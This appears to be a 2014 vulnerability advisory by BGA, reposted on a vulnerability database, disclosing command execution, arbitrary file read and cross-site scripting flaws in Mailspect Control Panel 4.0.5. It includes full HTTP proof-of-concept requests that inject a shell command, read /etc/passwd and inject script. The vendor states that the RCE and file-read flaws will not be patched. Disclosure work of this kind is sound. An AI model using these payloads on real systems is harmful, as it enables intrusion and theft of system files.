Mailspect Control Panel 4.0.5 Code Execution / File Read / XSS

2014.06.27
Credit: BGA
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Document Title: ============ Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities Release Date: =========== June 21, 2014 Product & Service Introduction: ======================== Mailspect is the email security and archiving brand of RAE Internet Inc., Tarrytown, New York. The Mailspect product suite was launched in 2005 as a Control Panel for Open Source antispam and antivirus scanning engines such as Clamd and Spamassassin. Mailspect Defense offered easy-to-use configuration and update tools and an integrated Quaratine Solution and Mail Filter. Subsequently, the Control Panel has expanded to include commercial scanning engines such as Cloudmark, ESET, F-FROT, Mailshell, and Sophos and built-in content filers and reputation engines. Abstract Advisory Information: ======================= BGA Team discovered a remote code execution, two arbitrary file read and one cross site scripting vulnerability in Mailspect Control Panel 4.0.5 web application. Vulnerability Disclosure Timeline: ========================= May 4, 2014 : Contact with Vendor May 16, 2014 : Vendor Response June 21, 2014 : Public Disclosure Discovery Status: ============= Published Affected Product(s): =============== Multilayered Email Security & Archive for Gateways, MTA's & Servers Product: Mailspect Control Panel 4.0.5 Other versions may be affected. Exploitation Technique: ================== RCE: Remote, Authenticated AFR: Remote, Authenticated XSS: Remote, Unauthenticated Severity Level: =========== High Technical Details & Description: ======================== 1. Sending a POST request to "/system_module.cgi" with config_version_cmd parameter's value set to a linux command group like "whoami > /tmp/who; /usr/local/MPP/mppd -v" causes the former command's execution by sending a GET request (or simply visiting) to "status_info.cgi?group=default" page. Other parameters with the suffix "_cmd" are probably vulnerable. 2. Sending a GET request to "/monitor_logs_ctl.cgi" with log_dir parameter's value set to "/" and log_file's value set to an arbitrary file name like "/etc/passwd" will cause the file's content's disclosure. 3. Sending a POST request to "/monitor_manage_logs.cgi" with log_file parameter's value set to an arbitrary file name like "/etc/passwd" will cause the file's content's disclosure. 4. Sending a POST request to "/monitor_manage_logs.cgi" with login parameter's value set to "></script>js to be executed<script/> leads the Javascript code's execution. Proof of Concept (PoC): ================== Proof of Concept RCE Request: POST /system_module.cgi HTTP/1.1 Host: 192.168.41.142:20001 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.41.142:20001/system_module.cgi?group=default Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428; p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 1282 post=1&config_mppd_conf=%2Fusr%2Flocal%2FMPP%2Fmppd.conf.xml&config_language=&config_log_dir=%2Fvar%2Flog%2FMPP%2F&config_version_cmd=whoami+%3E+%2Ftmp%2Fwho%3B+%2Fusr%2Flocal%2FMPP%2Fmppd+-v&config_licence_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-l+%2Fusr%2Flocal%2FMPP%2Fkey.txt&config_start_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd&config_stop_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-s&config_restart_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-r&config_sophos_daily=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fsophosdaily.sh&config_sophos_monthly=%2Fusr%2Flocal%2FMPP%2Fscripts%2Fsophosmonthly.pl&config_fprot_update=%2Fusr%2Flocal%2Ff-prot%2Ftools%2Fcheck-updates.pl&config_cloudmark_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fcloudmarkupdate.sh&config_cgate_submitted=%2Fvar%2FCommuniGate%2FSubmitted&config_clamav_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fclamavupdate.sh&config_cloudmark_dir=%2Fusr%2Flocal%2FMPP%2Fcloudmark&config_mailshell_dir=%2Fusr%2Flocal%2FMPP%2Fmailshell&config_fprot_dir=&config_pid_file=%2Fvar%2Frun%2Fmppd.pid&config_mailshell_update=%2Fusr%2Flocal%2FMPP%2Fmailshellupdate&config_mpp_parser_log_dir=%2Fvar%2Flog%2FMPP%2F%2Fplog&config_mpp_parser_time_interval=20&page_refresh=60 2. Proof of Concept AFR Request 1: GET /monitor_logs_ctl.cgi?log_file=/etc/passwd&log_dir=/&mode=tail&lines=50&filter=&dummy=0.4426060212816081 HTTP/1.1 Host: 192.168.41.142:20001 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.41.142:20001/monitor_realtime_logs.cgi?group=default Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428; p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706 Connection: keep-alive 3. Proof of Concept AFR Request 2: POST /monitor_manage_logs.cgi HTTP/1.1 Host: 192.168.41.142:20001 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.41.142:20001/monitor_manage_logs.cgi?group=default Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428; p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 85 group=default&post=1&log_file=/etc/passwd&download=Download&save_to_dir=&tar_gzip=on 4. Proof of Concept XSS Request: GET /login.cgi?login=abc%22%3E%3Cscript%3Ealert(/bga/)%3C/script%3E HTTP/1.1 Host: 192.168.41.142:20001 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Solution Fix & Patch: ================ XSS will be patched at version 4.0.7 There will be no patch for RCE and AFR vulnerabilities as stated at the vendor's reply. Security Risk: ========== The risk of the vulnerabilities above estimated as high. Credits & Authors: ============== Bilgi Guvenligi AKADEMISI - Onur ALANBEL, Ender AKBA&#222; Disclaimer & Information: =================== The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages. Domain: www.bga.com.tr/advisories.html Social: twitter.com/bgasecurity Contact: bilgi@bga.com.tr Copyright &#169; 2014 | BGA Security


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top